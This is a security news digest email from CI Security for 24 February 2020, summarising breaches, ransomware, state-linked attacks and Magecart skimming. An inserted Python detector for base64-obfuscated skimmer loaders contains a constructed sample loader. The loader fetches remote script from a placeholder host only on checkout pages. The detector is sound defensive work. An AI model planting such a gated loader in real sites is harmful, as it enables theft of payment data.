CI Security

IT Security News Blast – 2-24-2020

Details of 10.6 million MGM hotel guests posted on a hacking forum

The personal details of more than 10.6 million users who stayed at MGM Resorts hotels have been published on a hacking forum this week. Besides details for regular tourists and travelers, included in the leaked files are also personal and contact details for celebrities, tech CEOs, reporters, government officials, and employees at some of the world's largest tech companies.

https://www.zdnet.com/article/exclusive-details-of-10-6-million-of-mgm-hotel-guests-posted-on-a-hacking-forum/


Data breach hits agency overseeing White House communications

The US Department of Defence confirmed that computer systems controlled by the Defence Information Systems Agency (DISA) had been hacked, exposing the personal data of about 200,000 people. The agency oversees military communications including calls for US President Donald Trump. The data exposed included names and social security numbers. The agency is responsible for the military cyber-security and it sets up communications networks in combat zones.

https://www.bbc.com/news/technology-51580925


Hacked Off: Patients Sue Ransom-Paying Hospital Group

The lawsuit filed against Edison, N.J.-based Hackensack Meridian Health, which has 17 hospitals and other care locations in the state, seeks damages for the patients affected. [...] "As a consequence of the ransomware locking down the medical records ... plaintiffs and class members had to, among other things, forego medical care and treatment or had to seek alternative care and treatment," the lawsuit alleges.

https://www.bankinfosecurity.com/hmh-lawsuit-a-13736


Cyberattack on NRC Health sparks privacy concerns about private patient records stored by US hospitals

With NRC’s systems down, one chief information officer at a hospital said that it’s been a “major source of irritation internally,” because the systems are used to determine how much its physicians are getting paid. [...] There are also brewing concerns about whether NRC will determine that there was a breach of patient data, according to the source. If private information was accessed, hospitals will need to notify their patients.

https://www.cnbc.com/2020/02/20/nrc-health-cyberattack-sparks-privacy-concerns-about-patient-records-in-us.html


APIs latest target for cyber attacks on financial services firms: Akamai

However, some attacks used a mix of API targeting and other methodologies, the official release notes. On August 7 last year, Akamai recorded the single largest credential stuffing attack against a financial services firm in its history, consisting of 55,141,782 malicious login attempts. The top attack against the financial services sector was Local File Inclusion with 47 per cent observed traffic, followed by Cross-Site Scripting (XSS) and Denial of Service (DoS) attacks.

https://www.devdiscourse.com/article/technology/884566-apis-latest-target-for-cyber-attacks-on-financial-services-firms-akamai


PayPal ‘Critical’ Login Hack: New Report Warns You Are Now At Risk From Thieves

First came the confirmation that an authentication hack would enable an attacker to access an account once credentials had been phished, bypassing the financial firm’s authentication tools. And now another security report claims the entire authentication process can be bypassed, enabling an attacker to gain access to an account with nothing but stolen credentials, available for purchase on the dark web “for as little as $1.50.”

https://www.forbes.com/sites/zakdoffman/2020/02/22/paypal-critical-login-hack-new-report-warns-you-are-at-risk-from-thieves-heres-the-reality/#3ea8c8b445e2


An open letter to cyber security policy makers

It is imperative that cyber security policy makers take into account the unique technical and policy/governance issues associated with control systems. Current cyber security policies often have made control systems more susceptible to unintentional or malicious attacks because of the lack of input from the engineering organizations. This culture/governance gap needs to change.

https://www.controlglobal.com/blogs/unfettered/an-open-letter-to-cyber-security-policy-makers-control-system-cyber-security-is-different-than-it-and-requires-an-understanding-of-issues-unique-to-control-systems/


Silent Cyber - Recent court decision considers whether data is insurable tangible property loss

The Court sided with NIS and held that the insurer improperly denied the claim: NIS could recover under the Policy based on either the loss of data and software, or the loss of functionality of the computer system itself. In so holding, the Court relied on decisions from other federal jurisdictions which previously held that data or software can be susceptible to physical loss or damage.

https://www.jdsupra.com/legalnews/silent-cyber-recent-court-decision-68129/


ISS World faces cyber-attack; employees worldwide left offline

The websites of the company that employs half a million employees worldwide have been down since 17 February. 43,000 of the group's employees including 4,000 in the UK currently had no access to their emails, ThisWeekinFM reported on 20 February. ISS is yet to confirm the origin or perpetrators of the attack, but a BBC report has attributed ransomware.

https://www.scmagazineuk.com/iss-world-faces-cyber-attack-employees-worldwide-left-offline/article/1674690


U.S. joins other nations in accusing Russia of cyber attack in Republic of Georgia

Secretary of State Mike Pompeo and the Pentagon said in statements that the Russian military intelligence agency known as the GRU had carried out the attack. [...] “This action contradicts Russia’s attempts to claim it is a responsible actor in cyberspace and demonstrates a continuing pattern of reckless Russian GRU cyber operations against a number of countries,” Pompeo said. “These operations aim to sow division, create insecurity, and undermine democratic institutions.”

https://www.washingtonpost.com/national-security/2020/02/20/us-joins-others-accusing-russia-cyber-attack-republic-georgia/


Chinese-linked hacking group using Windows backdoors to go after gambling industry targets

Upon further investigation, it wasn’t immediately clear if the group itself, which Trend Micro has dubbed “DRBControl,” is a newcomer, according to Trend Micro researchers Daniel Lunghi, Cedric Pernet, Kenney Lu, and Jamz Yaneza. [...] “The exfiltrated data was mostly comprised of databases and source codes, which leads us to believe that the campaign is used for cyberespionage or gaining competitive intelligence,” researchers write.

https://www.cyberscoop.com/trend-micro-chinese-hacking-group-new-backdoors-gambling/


Cyberthefts Help North Korea Offset Revenue Lost to Sanctions

According to a report released by the U.N. Panel of Experts in August 2019, North Korea generated as much as $2 billion by conducting cyberattacks on banks and cryptocurrency exchanges, offsetting the amount the regime lost from sanctions. North Korea’s state-sponsored hackers conducted online bank and cryptocurrency heists in 17 countries, including Bangladesh, Chile, India, Poland, South Korea and South Africa, according to the U.N. report.

https://www.voanews.com/east-asia-pacific/cyberthefts-help-north-korea-offset-revenue-lost-sanctions


Massive DDoS Attack Shuts Down Iran’s Internet, Tehran Blames Washington

The head of Iran Civil Defense has accused Washington of the latest large-scale cyber-attack that targeted Iranian infrastructure. The coordinated Distributed Denial of Service (DDoS) attack affected two mobile operators and partially shut down Iran’s internet for hours. Iranian officials said they stopped the DDoS attack after activating Iran’s digital fortress DZHAFA shield.

https://www.cpomagazine.com/cyber-security/massive-ddos-attack-shuts-down-irans-internet-tehran-blames-washington/


Magecart Group 12 named as actor behind Olympic ticket POS attack

The ticket reselling sites olympictickets2020.com and eurotickets2020.com reportedly have been compromised with Magecart POS skimming malware. [...] Group 12 employs base64 encoded checks against the URL looking for the word “checkout” to identify the proper page on which to load their skimmer code. This encoding masked both the check itself and the skimmer URL, RiskIQ said.

https://www.scmagazine.com/home/security-news/malware/magecart-group-12-named-as-actor-behind-olympic-ticket-pos-attack/
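The base64-gated loader pattern RiskIQ describes above (decode a literal, compare it against the page URL, and fetch the skimmer only when "checkout" matches) is something a defender can hunt for statically in the JavaScript served by a checkout page. The following is an added Python example, not code from the article or from RiskIQ: it pulls base64-looking string literals out of page JavaScript, decodes them, and flags any that decode to checkout-related words or to a URL, which is exactly what the encoding was meant to hide. The sample script, the hostname cdn-stats.example.invalid and the keyword list are constructed for this example.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Constructed sample page script (not from the article): one benign base64
# literal (a MIME type) and one checkout-gated loader in the style RiskIQ
# describes. The hostname is a placeholder in the reserved .invalid TLD.
SAMPLE_JS = r'''
var hint = atob("aW1hZ2UvcG5n");
if (location.href.indexOf(atob("Y2hlY2tvdXQ=")) > -1) {
  var s = document.createElement("script");
  s.src = atob("aHR0cHM6Ly9jZG4tc3RhdHMuZXhhbXBsZS5pbnZhbGlkL2xvYWRlci5qcw==");
  document.head.appendChild(s);
}
'''

# Double-quoted literals made only of base64 alphabet characters, at least
# 8 long, with optional padding. Short tokens like "script" are skipped.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{8,}={0,2})"')

# Decoded strings worth a second look on a payment page: page-name gates
# and any URL, since a legitimate script rarely needs to hide either.
SUSPICIOUS = re.compile(r'checkout|cart|payment|https?://', re.IGNORECASE)


def decode_candidate(token: str) -> Optional[str]:
    """Decode a base64 literal; return None unless it yields printable ASCII."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def scan_js(source: str) -> List[Dict[str, object]]:
    """Return every base64 literal whose decoded form matches SUSPICIOUS."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for match in B64_LITERAL.finditer(line):
            decoded = decode_candidate(match.group(1))
            if decoded is not None and SUSPICIOUS.search(decoded):
                findings.append({
                    "line": lineno,
                    "literal": match.group(1),
                    "decoded": decoded,
                })
    return findings


if __name__ == "__main__":
    for f in scan_js(SAMPLE_JS):
        print(f"line {f['line']}: {f['literal']} -> {f['decoded']!r}")
```

Run against the sample, the scanner ignores the "image/png" literal and reports the two that matter: the gate that decodes to "checkout" and the loader URL. It is a heuristic, not a signature: the same approach extends to other encodings (hex, char-code arrays) and pairs naturally with a Content Security Policy and Subresource Integrity on the checkout page, which stop an unexpected third-party script from loading regardless of how its URL was obscured.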


Hacker Tied to Katie Hill Arrested for Cyber Attack on Her Opponent

The FBI on Friday arrested a man married to a staffer for former Democratic representative Katie Hill for a hacking spree against one of Hill's political opponents. Arthur Dam, the husband of Hill's campaign fundraiser and eventual district director Kelsey O’Hara, is charged with intentionally damaging and attempting to damage a protected computer for committing cyber attacks against Hill's Democratic rival Bryan Caforio.

https://freebeacon.com/politics/here-comes-throuple-hacker-tied-to-katie-hill-arrested-for-cyber-attack-on-her-opponent/


Airbnb Just Launched New Surveillance Bugs To Make Sure Guests Behave

So this is creepy. Airbnb, the world’s leading short-term rental platform has put aside the stories of hosts secretly spying on guests to launch a range of its own surveillance devices. [...] Functionality varies: Whereas the Minut device “monitors noise, temperature, motion, humidity and alarms when your property is unoccupied,” the Noise Aware Indoor Sensor “will alert you within minutes of sustained noise levels, not instantaneous noises like doors slamming,” and is being marketed as “the best way to protect your home, your neighbors, and your reputation.”

https://www.forbes.com/sites/zakdoffman/2020/02/23/airbnb-just-launched-these-intrusive-new-surveillance-bugs-to-ensure-you-all-behave/?ss=consumertech#7d12c3454719


Microsoft Brings Defender Antivirus for Linux, Coming Soon for Android and iOS

Almost within a year after releasing Microsoft Defender Advanced Threat Protection (ATP) for macOS computers, Microsoft today announced a public preview of its antivirus software for various Linux distributions, including Ubuntu, RHEL, CentOS and Debian. If this news hasn't gotten you excited yet... Microsoft is also planning to soon release Defender ATP anti-malware apps for smartphones and other devices running Google's Android and Apple's iOS mobile operating systems.

https://thehackernews.com/2020/02/windows-defender-atp-linux-android.html


Duped into running bogus virus scans at Office Depot? Dry your eyes with a small check from $35m settlement

The payouts come from a 2019 settlement the retail giant reached with the FTC, after the biz was accused of letting employees and a computer support provider trick punters into paying for unneeded malware cleanup and security software. Office Depot agreed to fork out $25m while not admitting liability. The regulator said that, between 2009 and 2016, the retailer and its partner company, support.com, used a rigged scanning tool that returned false positives for malware infections.

https://www.theregister.co.uk/2020/02/21/ftc_office_depot_fefunds/


Google Confirms ‘Malicious’ Security Threats Hiding On Play Store: Delete These 12 Apps Now

“Google is investing to battle malicious apps, but given the current state it’s not enough.” That issue is made crystal clear by new research released today—two separate threats actively hiding on the Play Store: Joker malware that has slipped the security net and the new danger of Haken. Both have driven large numbers of downloads, both have prompted Google to confirm it has removed all of the infected apps identified thus far, both now require users to delete any installs.

https://www.forbes.com/sites/zakdoffman/2020/02/21/google-confirms-malicious-security-threats-hiding-on-android-play-store-delete-these-12-apps-now/#e2d09099fc2b


The CIA Won't Admit It Uses Slack

The NSA, responding to a similar request, admitted that it had records responsive to the request—that the agency uses the demonic chat app, in other words—but said it couldn’t release them because they were a state secret. Recently, the CIA replied to our request by saying this: “CIA can neither confirm nor deny the existence or nonexistence of records responsive to your request. The fact of the existence or nonexistence of such records is itself currently and properly classified.”

https://www.vice.com/en_us/article/v74ymx/the-cia-wont-admit-they-use-slack



You are receiving this email because you are subscribed to receive the IT Security Daily Blast email from Michael Hamilton, Founder, President, and CISO of CI Security, formerly Critical Informatics.

Archived articles are available at https://ci.security/news/daily-news.

CI Security and the CI Security logo are the trademarks of CI Security, Inc. All other brand names, trademarks, service marks, and copyrights are the property of their respective owners.

© 2019 CI Security. All rights reserved.

CI Security
245 4th St, Suite 405  Bremerton, WA 98337